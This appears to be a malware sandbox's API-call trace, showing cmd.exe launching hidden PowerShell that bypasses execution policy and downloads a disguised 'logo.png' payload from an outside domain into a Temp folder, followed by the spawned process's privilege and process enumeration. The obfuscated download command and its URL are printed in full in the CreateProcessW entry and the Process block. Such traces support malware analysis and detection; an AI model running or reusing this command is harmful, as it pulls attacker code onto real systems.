	[0060.595] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x28e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e930) returned 0xffffffffffffffff
	[0060.595] GetLastError () returned 0x2
	[0060.595] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x28e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e930) returned 0xffffffffffffffff
	[0060.595] GetLastError () returned 0x2
	[0060.596] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0060.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x28e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e930) returned 0xffffffffffffffff
	[0060.596] GetLastError () returned 0x2
	[0060.597] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x28e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e930) returned 0xffffffffffffffff
	[0060.597] GetLastError () returned 0x2
	[0060.597] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x28e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e930) returned 0xffffffffffffffff
	[0060.597] GetLastError () returned 0x2
	[0060.598] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0060.598] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x28e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e930) returned 0xffffffffffffffff
	[0060.598] GetLastError () returned 0x2
	[0060.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x28e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e930) returned 0xffffffffffffffff
	[0060.599] GetLastError () returned 0x2
	[0060.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x28e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e930) returned 0xffffffffffffffff
	[0060.599] GetLastError () returned 0x2
	[0060.600] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0060.600] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x28e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e930) returned 0x2fa480
	[0060.600] GetProcessHeap () returned 0x2e0000
	[0060.600] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x28) returned 0x2f49a0
	[0060.600] FindClose (in: hFindFile=0x2fa480 | out: hFindFile=0x2fa480) returned 1
	[0060.600] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
	[0060.600] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
	[0060.600] GetConsoleTitleW (in: lpConsoleTitle=0x28ee80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0060.601] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ec38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ebf8 | out: lpAttributeList=0x28ec38, lpSize=0x28ebf8) returned 1
	[0060.601] UpdateProcThreadAttribute (in: lpAttributeList=0x28ec38, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ebe8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ec38, lpPreviousValue=0x0) returned 1
	[0060.601] GetStartupInfoW (in: lpStartupInfo=0x28ed50 | out: lpStartupInfo=0x28ed50*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0060.601] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1
	[0060.602] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Documents", lpStartupInfo=0x28ec70*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ec20 | out: lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessInformation=0x28ec20*(hProcess=0x54, hThread=0x50, dwProcessId=0x86c, dwThreadId=0x870)) returned 1
	[0060.611] CloseHandle (hObject=0x50) returned 1
	[0060.611] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0060.611] GetProcessHeap () returned 0x2e0000
	[0060.611] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fbb10 | out: hHeap=0x2e0000) returned 1
	[0060.611] GetEnvironmentStringsW () returned 0x2fb8d0*
	[0060.611] GetProcessHeap () returned 0x2e0000
	[0060.611] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb2c) returned 0x2fc820
	[0060.611] FreeEnvironmentStringsW (penv=0x2fb8d0) returned 1
	[0060.611] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) 

Process:
	id = "14"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5297c000"
	os_pid = "0x86c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "13"
	os_parent_pid = "0x538"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 124
	os_tid = 0x870

	[0061.558] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0062.733] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0062.734] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0062.734] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0062.734] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0064.642] GetVersionExW (in: lpVersionInformation=0xbdc90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xbdc90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0064.643] GetVersionExW (in: lpVersionInformation=0xbdc90*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xbdc90*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0064.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.717] GetVersionExW (in: lpVersionInformation=0xbda00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xbda00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0064.717] SetErrorMode (uMode=0x1) returned 0x1
	[0064.718] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xbdb60 | out: lpFileInformation=0xbdb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0064.719] SetErrorMode (uMode=0x1) returned 0x1
	[0064.750] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xbddd0 | out: lpdwHandle=0xbddd0) returned 0x94c
	[0064.812] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bf7370 | out: lpData=0x2bf7370) returned 1
	[0064.814] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xbdd48, puLen=0xbdd40 | out: lplpBuffer=0xbdd48*=0x2bf740c, puLen=0xbdd40) returned 1
	[0064.817] lstrlenW (lpString="䅁") returned 1
	[0064.824] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xbdcb8, puLen=0xbdcb0 | out: lplpBuffer=0xbdcb8*=0x2bf74e8, puLen=0xbdcb0) returned 1
	[0064.825] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0064.827] CoTaskMemAlloc (cb=0x2e) returned 0x395b70
	[0064.827] lstrcpyW (in: lpString1=0x395b70, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0064.828] CoTaskMemFree (pv=0x395b70) 
	[0064.828] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xbdcb8, puLen=0xbdcb0 | out: lplpBuffer=0xbdcb8*=0x2bf753c, puLen=0xbdcb0) returned 1
	[0064.828] lstrlenW (lpString="System.Management.Automation") returned 28
	[0064.828] CoTaskMemAlloc (cb=0x3c) returned 0x342ca0
	[0064.828] lstrcpyW (in: lpString1=0x342ca0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0064.828] CoTaskMemFree (pv=0x342ca0) 
	[0064.828] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xbdcb8, puLen=0xbdcb0 | out: lplpBuffer=0xbdcb8*=0x2bf7598, puLen=0xbdcb0) returned 1
	[0064.828] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0064.828] CoTaskMemAlloc (cb=0x20) returned 0x39bcd0
	[0064.828] lstrcpyW (in: lpString1=0x39bcd0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0064.828] CoTaskMemFree (pv=0x39bcd0) 
	[0064.828] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xbdcb8, puLen=0xbdcb0 | out: lplpBuffer=0xbdcb8*=0x2bf75d8, puLen=0xbdcb0) returned 1
	[0064.828] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0064.828] CoTaskMemAlloc (cb=0x44) returned 0x342ca0
	[0064.828] lstrcpyW (in: lpString1=0x342ca0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0064.828] CoTaskMemFree (pv=0x342ca0) 
	[0064.828] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xbdcb8, puLen=0xbdcb0 | out: lplpBuffer=0xbdcb8*=0x2bf7640, puLen=0xbdcb0) returned 1
	[0064.828] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0064.828] CoTaskMemAlloc (cb=0x76) returned 0x32ad90
	[0064.828] lstrcpyW (in: lpString1=0x32ad90, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0064.828] CoTaskMemFree (pv=0x32ad90) 
	[0064.828] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xbdcb8, puLen=0xbdcb0 | out: lplpBuffer=0xbdcb8*=0x2bf76dc, puLen=0xbdcb0) returned 1
	[0064.828] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0064.829] CoTaskMemAlloc (cb=0x44) returned 0x342ca0
	[0064.829] lstrcpyW (in: lpString1=0x342ca0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0064.829] CoTaskMemFree (pv=0x342ca0) 
	[0064.829] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xbdcb8, puLen=0xbdcb0 | out: lplpBuffer=0xbdcb8*=0x2bf7740, puLen=0xbdcb0) returned 1
	[0064.829] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0064.829] CoTaskMemAlloc (cb=0x58) returned 0x2ed4f0
	[0064.829] lstrcpyW (in: lpString1=0x2ed4f0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0064.829] CoTaskMemFree (pv=0x2ed4f0) 
	[0064.829] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xbdcb8, puLen=0xbdcb0 | out: lplpBuffer=0xbdcb8*=0x2bf77bc, puLen=0xbdcb0) returned 1
	[0064.829] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0064.829] CoTaskMemAlloc (cb=0x20) returned 0x39bcd0
	[0064.829] lstrcpyW (in: lpString1=0x39bcd0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0064.829] CoTaskMemFree (pv=0x39bcd0) 
	[0064.829] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xbdcb8, puLen=0xbdcb0 | out: lplpBuffer=0xbdcb8*=0x2bf7464, puLen=0xbdcb0) returned 1
	[0064.829] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0064.829] CoTaskMemAlloc (cb=0x66) returned 0x399b00
	[0064.829] lstrcpyW (in: lpString1=0x399b00, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0064.829] CoTaskMemFree (pv=0x399b00) 
	[0064.829] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xbdcb8, puLen=0xbdcb0 | out: lplpBuffer=0xbdcb8*=0x0, puLen=0xbdcb0) returned 0
	[0064.829] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xbdcb8, puLen=0xbdcb0 | out: lplpBuffer=0xbdcb8*=0x0, puLen=0xbdcb0) returned 0
	[0064.829] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xbdcb8, puLen=0xbdcb0 | out: lplpBuffer=0xbdcb8*=0x0, puLen=0xbdcb0) returned 0
	[0064.829] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xbdc88, puLen=0xbdc80 | out: lplpBuffer=0xbdc88*=0x2bf740c, puLen=0xbdc80) returned 1
	[0064.841] CoTaskMemAlloc (cb=0x204) returned 0x32db20
	[0064.841] VerLanguageNameW (in: wLang=0x0, szLang=0x32db20, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0064.842] CoTaskMemFree (pv=0x32db20) 
	[0064.842] VerQueryValueW (in: pBlock=0x2bf7370, lpSubBlock="\\", lplpBuffer=0xbdcd8, puLen=0xbdcd0 | out: lplpBuffer=0xbdcd8*=0x2bf7398, puLen=0xbdcd0) returned 1
	[0064.874] GetCurrentProcessId () returned 0x86c
	[0064.969] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xbcc00 | out: lpLuid=0xbcc00*(LowPart=0x14, HighPart=0)) returned 1
	[0064.971] GetCurrentProcess () returned 0xffffffffffffffff
	[0064.972] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xbcc20 | out: TokenHandle=0xbcc20*=0x2ec) returned 1
	[0064.979] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2bfabe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0064.987] CloseHandle (hObject=0x2ec) returned 1
	[0065.022] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x86c) returned 0x2ec
	[0065.043] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2bfac50, cb=0x200, lpcbNeeded=0xbdc38 | out: lphModule=0x2bfac50, lpcbNeeded=0xbdc38) returned 1
	[0065.056] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13ff20000, lpmodinfo=0x2bfaec0, cb=0x18 | out: lpmodinfo=0x2bfaec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0065.057] CoTaskMemAlloc (cb=0x804) returned 0x39dd60
	[0065.057] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13ff20000, lpBaseName=0x39dd60, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0065.057] CoTaskMemFree (pv=0x39dd60) 
	[0065.058] CoTaskMemAlloc (cb=0x804) returned 0x39dd60
	[0065.058] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13ff20000, lpFilename=0x39dd60, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0065.058] CoTaskMemFree (pv=0x39dd60) 
	[0065.059] CloseHandle (hObject=0x2ec) returned 1
	[0065.112] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x86c) returned 0x2ec
	[0065.158] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0xbdd68 | out: lpExitCode=0xbdd68*=0x103) returned 1
	[0065.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bfb088, Length=0x20000, ResultLength=0xbdd30 | out: SystemInformation=0x12bfb088, ResultLength=0xbdd30*=0xf2b8) returned 0x0
	[0065.252] EnumWindows (lpEnumFunc=0x2b766ac, lParam=0x0) returned 1
	[0065.253] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.254] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.254] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.254] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x334
	[0065.254] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x324
	[0065.254] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.254] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.254] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.254] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.254] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.254] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.254] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.255] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.255] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.255] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x45c
	[0065.255] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.255] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.255] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x5e0
	[0065.255] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x90
	[0065.255] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.255] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x914
	[0065.255] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.255] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.256] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.256] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.256] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.256] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.256] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.256] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x840
	[0065.256] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x844
	[0065.256] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x46c
	[0065.256] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0xb40
	[0065.256] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x914
	[0065.256] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x988
	[0065.256] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x914
	[0065.257] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x950
	[0065.257] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x914
	[0065.257] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x914
	[0065.257] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x868
	[0065.257] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x850
